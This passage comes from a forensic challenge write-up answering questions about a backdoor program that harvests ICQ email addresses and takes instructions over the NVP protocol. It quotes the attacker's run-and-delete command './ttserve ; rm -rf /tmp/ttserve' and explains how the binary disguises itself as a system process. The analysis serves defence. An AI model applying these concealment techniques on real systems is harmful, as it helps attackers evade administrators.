requests, but the UDP packet which reports home was not found in the
snort log. It was either removed from the snort log in order to
obfuscate it, or the program has a bug which I cannot find :-(


4. Answers

4.1.What is the attacker's IP address? 

Most likely, this is 216.242.103.2. This is the address the foo
program was downloaded from, as well as the IP address from which
instructions are expected to come, and results are sent, by the 'foo'
program.


4.2.What is the attacker doing first? What do you think is his/her
motivation for doing this? 

First, the attacker checks if this machine is a nameserver for some
domains. His motivation could be to forge some host names, to appear
they belong to one of the domains served by this nameserver.


4.3.Why there is some readable text in packets #17-#25 (and some
others), but not in packets #15-#16 (and several others)? What
differentiates these groups of packets from each other?

I assume the padding in the NVP backdoor traffic is not encrypted and
the clear-text contents of those packets is the contents of the memory
buffer used for decryption of previous packets.


4.4.What is the purpose of 'foo'? Can you provide more insights about
the internal workings of 'foo'? Do you think that 'foo' was coded by a
good programmer or by an amateur?

Please refer to section 3.2, where a detailed analysis of 'foo' was
performed. 

The purpose of this program is to harvest email addresses of ICQ
users.

The program was coded by a beginner. There is unnecessarily complex
code to daemonize the process, nonblocking I/O is incorrectly used
(for instance, the program is busy-waiting in function2() for data),
the check for an error return value from socket() is wrong, ip_address
is not needed since gethostbyname() is enough to parse a dotted
decimal representation of a host's IP address, etc.


4.5.What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done
by the attacker?

This is done by the attacker to hide the existance of the 'foo' binary
on the compromised system. 

Once ttserver (the downloaded 'foo' program) is launched, it
daemonizes itself and hides from 'ps' by overwriting its commandline
so it appears to be "(nfsiod)" running as user daemon, thus a system
process.

If the program is running, when the executable file is rm'ed, it is
not really deleted from disk, but rather its inode is marked as
deleted. Since the inode is locked (because the program is running),
the file will actually be removed only when the program terminates.


4.6.How do you think the attacker will use the results of his activity
involving 'foo'? 

My first guess was that his activity (collecting email addresses of
ICQ users) was related to a possible ICQ hack (stealing of ICQ
accounts). 

This cannot be true, since there is no way the attacker is going to be
able to say which UIN a certain email address belongs to. Even though
UINs are scanned sequentially, some UINs are not in use any more and
on those UINs profile page, there will be no email address listed,
thus no line will be generated for those UINs in the report packet.

Actually, there are 164 email addresses in those 100 tcp flows to
web.icq.com. Of those, 88 are email addresses of the form
UIN@pager.icq.com for an email-to-icq gateway at icq.com and 76
addresses are listed as user email addresses. However, only the first 
email address is saved, so there is no way this address (@pager.icq.com)
can be related to the real email address.

My best guess is that these email addresses are harvested for spamming
(possibly sell the lists to spammers ?!), nothing more.


Bonus Question: 

4.7.If you administer a network, would you have caught such NVP
backdoor communication? If yes, how? If you do not administer a
network, what do you think is the best way to prevent such
communication from happening and/or detect it?

Because of a lack of system administration resources, I wouldn't have
detected the NVP backdoor traffic in a timely manner, as the firewall
logs are only analyzed from time to time. However, the firewall
wouldn't have allowed this traffic to pass, as we're implicitly
denying whatever is not explicitly allowed, thus blocking this kind of
communication and render the backdoor unusable.

I believe this is a good policy, as an attacker would be forced to use
an "open" communication channel, which would be less likely possible
if the attack (wu-ftpd exploit, installation of backdoor, etc) was
automated. The attacker would have to first look for some means of
passing traffic through the firewall and adapt the backdoor server
accordingly.